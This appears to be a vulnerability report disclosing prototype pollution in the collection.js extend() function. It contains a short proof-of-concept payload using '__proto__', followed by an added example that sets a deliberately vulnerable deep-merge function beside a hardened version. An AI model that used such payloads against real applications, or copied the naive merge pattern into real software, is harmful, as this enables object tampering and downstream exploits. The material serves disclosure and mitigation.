Hi, I found a prototype pollution when using the function extend().
The extend function at line 319 in file Collection.js/dist/node/iterators/extend.js passes obj the inner value of args, whose stereotype contains the test attribute.
The POC is:
```js
var collection = require("collection.js")
bad_payload = JSON.parse('{"__proto__":{"polluted":"yes"}}');
collection.extend(true,{},bad_payload)
console.log("result:"+ {}.polluted)
```
The risk line is here:
Collection/dist/node/iterators/extend.js
Line 324 in be32c48
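
The mitigation pattern for the issue reported above, as an added example that is not taken from Collection.js or from the reporter: a recursive merge that walks into `__proto__`, next to a version that skips prototype-bearing keys. The function names and the sample payload are assumptions constructed for illustration.

```javascript
// Added example; helper names are hypothetical, not Collection.js APIs.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isPlainObject(v) {
  if (v === null || typeof v !== 'object') return false;
  const proto = Object.getPrototypeOf(v);
  return proto === Object.prototype || proto === null;
}

// Vulnerable pattern: target['__proto__'] resolves to Object.prototype,
// so the recursion writes the payload's keys onto every object.
function naiveDeepExtend(target, source) {
  for (const key in source) {
    const val = source[key];
    if (isPlainObject(val)) {
      if (!isPlainObject(target[key])) target[key] = {};
      naiveDeepExtend(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Hardened pattern: own keys only, prototype-bearing keys skipped,
// and recursion only into objects the target owns itself.
function safeDeepExtend(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const val = source[key];
    if (isPlainObject(val)) {
      const owned = Object.prototype.hasOwnProperty.call(target, key);
      const child = owned && isPlainObject(target[key]) ? target[key] : {};
      target[key] = safeDeepExtend(child, val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Runs both merges on a constructed payload and undoes the pollution.
function demo() {
  const payload = JSON.parse('{"__proto__":{"polluted":"yes"},"a":{"b":1}}');
  naiveDeepExtend({}, payload);
  const afterNaive = ({}).polluted;
  delete Object.prototype.polluted;
  const merged = safeDeepExtend({}, payload);
  return { afterNaive, afterSafe: ({}).polluted, merged };
}
```

`JSON.parse` creates `__proto__` as an own enumerable key, which is why filtering by key name is needed in addition to iterating own keys only.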